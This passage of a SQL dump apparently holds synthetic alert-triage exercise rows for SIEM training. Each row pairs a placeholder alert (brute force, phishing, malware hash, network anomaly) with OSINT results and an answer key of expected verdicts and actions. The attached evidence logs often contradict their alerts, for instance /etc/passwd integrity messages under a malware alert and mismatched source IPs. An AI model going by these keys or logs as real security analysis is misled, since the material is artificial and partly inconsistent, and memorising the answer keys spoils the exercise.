mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T18:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"203.0.113.175\\\",\\\"domain\\\":\\\"exfiltration-domain.com\\\",\\\"username\\\":\\\"dataadmin\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.912Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T18:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"203.0.113.175\\\",\\\"domain\\\":\\\"exfiltration-domain.com\\\",\\\"username\\\":\\\"dataadmin\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.912Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T18:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"203.0.113.175\\\",\\\"domain\\\":\\\"exfiltration-domain.com\\\",\\\"username\\\":\\\"dataadmin\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.912Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T18:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"203.0.113.175\\\",\\\"domain\\\":\\\"exfiltration-domain.com\\\",\\\"username\\\":\\\"dataadmin\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.912Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T18:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"203.0.113.175\\\",\\\"domain\\\":\\\"exfiltration-domain.com\\\",\\\"username\\\":\\\"dataadmin\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1386, 'False Positive: Routine Internal Network Scan', 'low', 'Elastic SIEM', 'Detected a series of network connections which appear to be a routine internal scan.', 'Lateral Movement', 'T1021', 0, 'Closed', 233, '{\"timestamp\":\"2026-03-02T09:25:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.1.1.1\",\"dst_ip\":\"10.1.1.10\",\"username\":\"networkscanner\",\"hostname\":\"scanner-host\"}', '2026-03-02 03:07:37', '2026-03-03 12:13:40', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.1.1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP for network scanning tool\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal network device\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The activity matches the pattern of a scheduled internal network scan.\"}', 'Novice', 'SIEM', 1, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.914Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:25:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.1.1.1\\\",\\\"dst_ip\\\":\\\"10.1.1.10\\\",\\\"username\\\":\\\"networkscanner\\\",\\\"hostname\\\":\\\"scanner-host\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.914Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:25:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.1.1.1\\\",\\\"dst_ip\\\":\\\"10.1.1.10\\\",\\\"username\\\":\\\"networkscanner\\\",\\\"hostname\\\":\\\"scanner-host\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.914Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:25:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.1.1.1\\\",\\\"dst_ip\\\":\\\"10.1.1.10\\\",\\\"username\\\":\\\"networkscanner\\\",\\\"hostname\\\":\\\"scanner-host\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.914Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:25:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.1.1.1\\\",\\\"dst_ip\\\":\\\"10.1.1.10\\\",\\\"username\\\":\\\"networkscanner\\\",\\\"hostname\\\":\\\"scanner-host\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.914Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:25:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.1.1.1\\\",\\\"dst_ip\\\":\\\"10.1.1.10\\\",\\\"username\\\":\\\"networkscanner\\\",\\\"hostname\\\":\\\"scanner-host\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1387, 'Brute Force Attack from Foreign IP', 'medium', 'Splunk', 'Multiple failed login attempts detected from an external IP known for malicious activity.', 'Brute Force', 'T1110', 0, 'Closed', 142, '{\"timestamp\":\"2026-03-02T08:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"185.92.220.50\",\"dst_ip\":\"192.168.1.15\",\"username\":\"admin\",\"hostname\":\"CORP-SERVER01\",\"failed_attempts\":45}', '2026-03-02 03:09:19', '2026-03-07 05:14:55', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Commonly targeted username\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal address\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The foreign IP is flagged as malicious with multiple failed login attempts, confirming the brute force attack.\"}', 'Novice', 'SIEM', 1, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.915Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.92.220.50\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"failed_attempts\\\":45}\"},{\"timestamp\":\"2026-03-02T13:54:06.915Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.92.220.50\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"failed_attempts\\\":45}\"},{\"timestamp\":\"2026-03-02T13:53:06.915Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.92.220.50\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"failed_attempts\\\":45}\"},{\"timestamp\":\"2026-03-02T13:52:06.915Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.92.220.50\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"failed_attempts\\\":45}\"},{\"timestamp\":\"2026-03-02T13:51:06.915Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.92.220.50\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"failed_attempts\\\":45}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1388, 'Suspicious Login Activity', 'low', 'Wazuh', 'Unusual login attempts detected from a known VPN server.', 'Brute Force', 'T1110', 0, 'Closed', 225, '{\"timestamp\":\"2026-03-02T10:15:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.101\",\"dst_ip\":\"192.168.2.25\",\"username\":\"jdoe\",\"hostname\":\"WORKSTATION01\",\"failed_attempts\":10}', '2026-03-02 03:09:19', '2026-03-07 11:44:59', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP associated with VPN use, not flagged as malicious\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Regular user account\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.2.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal address\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP is associated with VPN use but not flagged as malicious, indicating benign activity.\"}', 'Novice', 'SIEM', 1, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.917Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.2.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"WORKSTATION01\\\",\\\"failed_attempts\\\":10}\"},{\"timestamp\":\"2026-03-02T13:54:06.917Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.2.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"WORKSTATION01\\\",\\\"failed_attempts\\\":10}\"},{\"timestamp\":\"2026-03-02T13:53:06.917Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.2.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"WORKSTATION01\\\",\\\"failed_attempts\\\":10}\"},{\"timestamp\":\"2026-03-02T13:52:06.917Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.2.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"WORKSTATION01\\\",\\\"failed_attempts\\\":10}\"},{\"timestamp\":\"2026-03-02T13:51:06.917Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed 
password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.2.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"WORKSTATION01\\\",\\\"failed_attempts\\\":10}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1389, 'Potential Malware Detected by File Hash', 'high', 'Elastic SIEM', 'A file with a known malicious hash was executed on an internal machine.', 'Malware', 'T1059', 0, 'investigating', NULL, '{\"timestamp\":\"2026-03-02T11:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.3.5\",\"dst_ip\":\"\",\"username\":\"bsmith\",\"hostname\":\"LAPTOP01\",\"command_line\":\"C:\\\\malicious.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-02 03:09:19', '2026-03-09 13:55:53', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No detections found for this hash\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\malicious.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Common false positive hash\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.3.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal address\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash was not detected as malicious, indicating a false positive.\"}', 'Novice', 'SIEM', 1, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.918Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. 
Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.5\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"LAPTOP01\\\",\\\"command_line\\\":\\\"C:\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.918Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.5\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"LAPTOP01\\\",\\\"command_line\\\":\\\"C:\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.918Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.5\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"LAPTOP01\\\",\\\"command_line\\\":\\\"C:\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.918Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.5\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"LAPTOP01\\\",\\\"command_line\\\":\\\"C:\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.918Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.5\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"LAPTOP01\\\",\\\"command_line\\\":\\\"C:\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1390, 'Phishing Email with Suspicious URL', 'medium', 'Azure Sentinel', 'A phishing email was detected containing a suspicious URL.', 'Phishing', 'T1566', 0, 'Closed', 225, '{\"timestamp\":\"2026-03-02T12:30:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.12\",\"email_sender\":\"fake@phishingsite.com\",\"username\":\"jdoe\",\"hostname\":\"MAILSERVER\",\"url\":\"http://suspicious-url.com/login\"}', '2026-03-02 03:09:19', '2026-03-06 10:28:45', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"fake@phishingsite.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Domain known for phishing attempts\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://suspicious-url.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"URL associated with phishing domains\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"198.51.100.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"IP associated with phishing emails\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The phishing email contains a suspicious URL, but no malicious activity confirmed.\"}', 'Novice', 'SIEM', 1, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.920Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:30:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.12\\\",\\\"email_sender\\\":\\\"fake@phishingsite.com\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"MAILSERVER\\\",\\\"url\\\":\\\"http://suspicious-url.com/login\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.920Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:30:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.12\\\",\\\"email_sender\\\":\\\"fake@phishingsite.com\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"MAILSERVER\\\",\\\"url\\\":\\\"http://suspicious-url.com/login\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.920Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:30:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.12\\\",\\\"email_sender\\\":\\\"fake@phishingsite.com\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"MAILSERVER\\\",\\\"url\\\":\\\"http://suspicious-url.com/login\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.920Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:30:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.12\\\",\\\"email_sender\\\":\\\"fake@phishingsite.com\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"MAILSERVER\\\",\\\"url\\\":\\\"http://suspicious-url.com/login\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.920Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected 
[Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:30:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.12\\\",\\\"email_sender\\\":\\\"fake@phishingsite.com\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"MAILSERVER\\\",\\\"url\\\":\\\"http://suspicious-url.com/login\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1391, 'Unusual Network Connection to External IP', 'low', 'Splunk', 'A device attempted to connect to an external IP known for hosting benign services.', 'Network Anomaly', 'T1071', 0, 'Closed', 225, '{\"timestamp\":\"2026-03-02T13:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.4.10\",\"dst_ip\":\"93.184.216.34\",\"username\":\"psmith\",\"hostname\":\"DESKTOP02\"}', '2026-03-02 03:09:19', '2026-03-09 02:45:30', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"93.184.216.34\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"IP associated with benign web services\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.4.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"psmith\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Regular user account\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_anomaly\",\"analysis_notes\":\"The external IP is associated with benign services, indicating a false positive.\"}', 'Novice', 'SIEM', 1, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.921Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.4.10\\\",\\\"dst_ip\\\":\\\"93.184.216.34\\\",\\\"username\\\":\\\"psmith\\\",\\\"hostname\\\":\\\"DESKTOP02\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.921Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
